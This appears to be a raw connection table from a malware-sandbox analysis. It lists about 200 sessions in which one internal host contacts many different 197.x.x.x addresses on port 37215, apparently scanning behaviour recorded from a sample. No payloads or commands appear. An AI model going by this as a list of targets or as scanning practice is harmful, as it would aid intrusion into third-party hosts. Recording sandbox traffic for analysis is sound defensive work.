                                                                            13734192.168.2.1542602197.218.118.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13735192.168.2.1539284197.141.173.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13736192.168.2.1534434197.81.58.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13737192.168.2.1543040197.13.4.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13738192.168.2.1545498197.120.142.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13739192.168.2.1557448197.158.72.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13740192.168.2.1535398197.31.113.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13741192.168.2.1555600197.175.127.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13742192.168.2.1544108197.188.36.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13743192.168.2.1533940197.80.224.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13744192.168.2.1542486197.132.131.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13745192.168.2.1535060197.88.51.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13746192.168.2.1541050197.65.22.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13747192.168.2.1558490197.171.142.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13748192.168.2.1556436197.36.13.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13749192.168.2.1551848197.39.35.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13750192.168.2.1559942197.105.151.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13751192.168.2.1533338197.76.82.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13752192.168.2.1552884197.101.95.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13753192.168.2.1534758197.112.229.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13754192.168.2.1534382197.128.164.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13755192.168.2.1558332197.161.92.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13756192.168.2.1542956197.78.41.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13757192.168.2.1537208197.97.23.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13758192.168.2.1536790197.201.92.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13759192.168.2.1549962197.252.202.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13760192.168.2.1550356197.213.31.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13761192.168.2.1555744197.31.150.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13762192.168.2.1552484197.17.79.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13763192.168.2.1535188197.117.207.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13764192.168.2.1558616197.28.221.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13765192.168.2.1544822197.40.17.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13766192.168.2.1535108197.151.160.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13767192.168.2.1542566197.10.213.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13768192.168.2.1541820197.99.185.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13769192.168.2.1546742197.139.38.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13770192.168.2.1549596197.216.52.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13771192.168.2.1537858197.139.223.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13772192.168.2.1545000197.236.167.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13773192.168.2.1537002197.121.101.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13774192.168.2.1543848197.32.142.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13775192.168.2.1539000197.251.190.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13776192.168.2.1539170197.202.92.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13777192.168.2.1554468197.177.158.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13778192.168.2.1552596197.126.149.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13779192.168.2.1533498197.158.87.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13780192.168.2.1537006197.206.54.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13781192.168.2.1560786197.10.199.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13782192.168.2.1557802197.83.184.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13783192.168.2.1536148197.75.95.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13784192.168.2.1539058197.110.62.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13785192.168.2.1534860197.178.72.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13786192.168.2.1553220197.81.60.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13787192.168.2.1546692197.146.131.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13788192.168.2.1553048197.94.162.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13789192.168.2.1541162197.194.56.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13790192.168.2.1538848197.130.197.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13791192.168.2.1558860197.137.139.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13792192.168.2.1533184197.191.19.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13793192.168.2.1543266197.201.183.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13794192.168.2.1542822197.130.2.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13795192.168.2.1556308197.244.141.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13796192.168.2.1549844197.3.72.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13797192.168.2.1543484197.126.54.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13798192.168.2.1541516197.58.158.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13799192.168.2.1538742197.78.248.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13800192.168.2.1555864197.20.229.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13801192.168.2.1533186197.255.41.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13802192.168.2.1539588197.114.98.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13803192.168.2.1547974197.59.188.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13804192.168.2.1558988197.255.185.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13805192.168.2.1558480197.115.52.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13806192.168.2.1542314197.195.2.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13807192.168.2.1558084197.233.115.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13808192.168.2.1542616197.33.184.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13809192.168.2.1540832197.61.155.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13810192.168.2.1546104197.80.16.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13811192.168.2.1559376197.109.182.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13812192.168.2.1540712197.6.87.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13813192.168.2.1537804197.235.121.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13814192.168.2.1555888197.4.216.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13815192.168.2.1552764197.54.67.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13816192.168.2.1534854197.25.72.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13817192.168.2.1538694197.214.152.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13818192.168.2.1555054197.179.2.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13819192.168.2.1544208197.159.70.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13820192.168.2.1543580197.109.93.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13821192.168.2.1538280197.151.4.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13822192.168.2.1547900197.172.118.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13823192.168.2.1539102197.226.25.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13824192.168.2.1557400197.191.248.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13825192.168.2.1537864197.221.216.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13826192.168.2.1550778197.42.93.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13827192.168.2.1551716197.135.236.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13828192.168.2.1539920197.234.184.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13829192.168.2.1537724197.232.167.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13830192.168.2.1542542197.196.158.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13831192.168.2.1533860197.3.80.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13832192.168.2.1552990197.59.77.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13833192.168.2.1539608197.157.104.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13834192.168.2.1556204197.41.10.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13835192.168.2.1538956197.13.178.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13836192.168.2.1560366197.224.9.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13837192.168.2.1537530197.238.2.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13838192.168.2.1547116197.198.225.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13839192.168.2.1549628197.199.5.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13840192.168.2.1554668197.176.239.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13841192.168.2.1557144197.150.114.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13842192.168.2.1549860197.181.41.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13843192.168.2.1548770197.71.233.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13844192.168.2.1557714197.195.155.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13845192.168.2.1554006197.48.5.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13846192.168.2.1552908197.227.135.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13847192.168.2.1558510197.178.145.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13848192.168.2.1554660197.182.212.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13849192.168.2.1554232197.231.139.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13850192.168.2.1559392197.111.57.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13851192.168.2.1538840197.91.150.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13852192.168.2.1554206197.195.221.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13853192.168.2.1547322197.26.140.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13854192.168.2.1552074197.227.67.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13855192.168.2.1552314197.155.129.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13856192.168.2.1557066197.238.32.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13857192.168.2.1557316197.205.3.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13858192.168.2.1544026197.24.33.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13859192.168.2.1553370197.87.17.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13860192.168.2.1533432197.107.54.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13861192.168.2.1543870197.117.173.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13862192.168.2.1557254197.197.92.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13863192.168.2.1558534197.15.224.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13864192.168.2.1552024197.154.129.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13865192.168.2.1549088197.207.226.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13866192.168.2.1552376197.232.170.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13867192.168.2.1559648197.37.131.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13868192.168.2.1549808197.94.194.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13869192.168.2.1553422197.187.209.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13870192.168.2.1552012197.165.195.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13871192.168.2.1555276197.45.199.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13872192.168.2.1556748197.44.124.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13873192.168.2.1553792197.172.114.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13874192.168.2.1554732197.174.48.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13875192.168.2.1549102197.116.17.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13876192.168.2.1536890197.87.147.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13877192.168.2.1552056197.136.130.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13878192.168.2.1552004197.106.20.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13879192.168.2.1535204197.211.40.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13880192.168.2.1558638197.9.172.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13881192.168.2.1549102197.50.36.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13882192.168.2.1544494197.209.192.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13883192.168.2.1543200197.62.225.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13884192.168.2.1534110197.99.42.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13885192.168.2.1534538197.127.49.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13886192.168.2.1536806197.240.239.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13887192.168.2.1543448197.70.90.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13888192.168.2.1546404197.113.156.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13889192.168.2.1543078197.72.156.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13890192.168.2.1544080197.210.143.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13891192.168.2.1535360197.16.34.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13892192.168.2.1553174197.26.215.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13893192.168.2.1559350197.7.86.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13894192.168.2.1534534197.158.148.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13895192.168.2.1538840197.152.130.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13896192.168.2.1542730197.64.97.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13897192.168.2.1557310197.98.215.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13898192.168.2.1533570197.202.189.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13899192.168.2.1549104197.102.136.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13900192.168.2.1548478197.252.169.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13901192.168.2.1532790197.59.123.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13902192.168.2.1538386197.132.222.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13903192.168.2.1554584197.200.147.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13904192.168.2.1534818197.182.144.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13905192.168.2.1543108197.18.0.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13906192.168.2.1552538197.213.77.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13907192.168.2.1554474197.234.53.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13908192.168.2.1534944197.40.176.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13909192.168.2.1558204197.245.196.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13910192.168.2.1558946197.237.63.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13911192.168.2.1537374197.216.145.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13912192.168.2.1549118197.188.165.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13913192.168.2.1553808197.138.186.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13914192.168.2.1555536197.108.18.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13915192.168.2.1556896197.93.61.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13916192.168.2.1545302197.138.59.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13917192.168.2.1535464197.35.5.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13918192.168.2.1560116197.47.46.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13919192.168.2.1554082197.213.202.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13920192.168.2.1538870197.187.252.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13921192.168.2.1544186197.238.23.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13922192.168.2.1551828197.155.249.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13923192.168.2.1538074197.227.66.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13924192.168.2.1559904197.214.236.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13925192.168.2.1532988197.114.139.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13926192.168.2.1534616197.65.206.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13927192.168.2.1532836197.24.133.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13928192.168.2.1546196197.196.118.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13929192.168.2.1544926197.123.108.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13930192.168.2.1555196197.193.233.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13931192.168.2.1538684197.112.10.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13932192.168.2.1551426197.143.219.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13933192.168.2.1537454197.106.141.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
